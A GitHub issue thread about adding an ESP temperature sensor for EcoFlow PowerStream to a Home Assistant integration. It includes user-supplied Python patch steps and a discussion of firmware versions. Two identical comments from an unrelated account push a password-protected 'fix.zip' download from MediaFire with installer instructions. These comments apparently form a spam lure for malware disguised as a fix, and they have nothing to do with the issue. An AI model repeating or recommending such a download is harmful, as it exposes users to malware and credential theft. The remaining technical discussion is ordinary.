### ISSUE TITLE
PowerStream ESP Temperature missing

### ISSUE THREAD

**Issue by Dev-Fabry** [tolwi/hassio-ecoflow-cloud#300]
Please add "20_1.espTempsensor" to sensors.

With latest EcoFlow firmwares it seems to report a real temperature (it grows from 30C to 55C in my powerstreams)

Maybe can be useful as inverter internal temperature sensor since "20_1.invTemp" is always 0

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Fabry** [comment]
For those who want to manually add the sensor here are the steps to follow:

* Using a file editor, edit the custom_components/ecoflow_cloud/sensor.py file

* Add just below the TempSensorEntity class this new class :

```
class CelsiusSensorEntity(TempSensorEntity):
    def _update_value(self, val: Any) -> bool:
        return super()._update_value(int(val))
```



* Save the file and then edit the file custom_components/ecoflow_cloud/devices/public/powerstream.py

* Inside the sensors method (def sensors(self, client: EcoflowApiClient) ...) that returns an array of sensors, add this new element `CelsiusSensorEntity(client, self, "20_1.espTempsensor", "ESP Temperature"),` somewhere and then save the file

* Now edit the manifest custom_components/ecoflow_cloud/manifest.json and increment the version number.
For example from "version": "1.1.0-pre6" to "version": "1.1.1-pre6"
Save the file

* Restart Home Assistant

Now you have the new sensor ESP Temperature available.

**Comment by jurgen2005** [comment]
Why is this not just added in the releases?

**Comment by Dev-Fabry** [comment]
> Why is this not just added in the releases?

Maybe the sensor is not available in Application Api and when Tolwi has added Open Api it was left out, now we have to wait for him to integrate it into the codebase or do it ourselves if we want to see it immediately

**Comment by Naumsede** [comment]
Unfortunately, the pathway above doesn't work for me. I tried to insert the sensor several times but afterwards no sensor of the powerstream works any more. 
What could be the mistake?
Kind regards

**Comment by Dev-Fabry** [comment]
Sorry my faults, missing step in the instruction (now fixed).

Please re-edit custom_components/ecoflow_cloud/devices/public/powerstream.py and change the import statement like this:
```

from ...sensor import StatusSensorEntity, InWattsSolarSensorEntity, DecivoltSensorEntity, CentivoltSensorEntity, \
    DeciampSensorEntity, DecicelsiusSensorEntity, CelsiusSensorEntity, MiscSensorEntity, LevelSensorEntity, DeciwattsSensorEntity, \
    AmpSensorEntity, RemainSensorEntity, DecihertzSensorEntity
```

Then restart HA and should work.

**Comment by Dev-Fabry** [comment]
Code added in main branch, when v1.1.0-pre8 will come out, it will available to everyone

**Comment by jurgen2005** [comment]
all temperature sensors still show -1C with v1.1.0 on my ecoflow powerstream thats on 1.1.4.92

**Comment by Dev-Fabry** [comment]
With my powerstreams (two units) ESP Temperature moves between 30 degrees and 55 degrees (I only have one 425W panel connected to each for now).
Now that it is raining and with zero production (but inverter on) I have a temperature of 29 degrees Celsius (air at 21C)

My firmware was:
WiFi: 1.0.4.87 (maybe I don't remember the right number)
Inverter: 1.0.1.217

Today I updated to:
WiFi: 1.0.4.92
Inverter: 1.0.1.222

**Comment by giovanne123** [comment]
I think the inverter firmware is what is needed for the esp temperature, I think >= *.217 or maybe >= *.213

I am still in *.211 and there it is not implemented.

**Comment by Dev-Fabry** [comment]
I installed the .213 (with WiFi 4.62) on August 14th and the .217 a few days later (how many days later).
And today the .222 on one inverter (the other inverter is unfortunately turned off and cannot be updated for now)

I'm not sure but I think I already had ESP Temp with the .213.
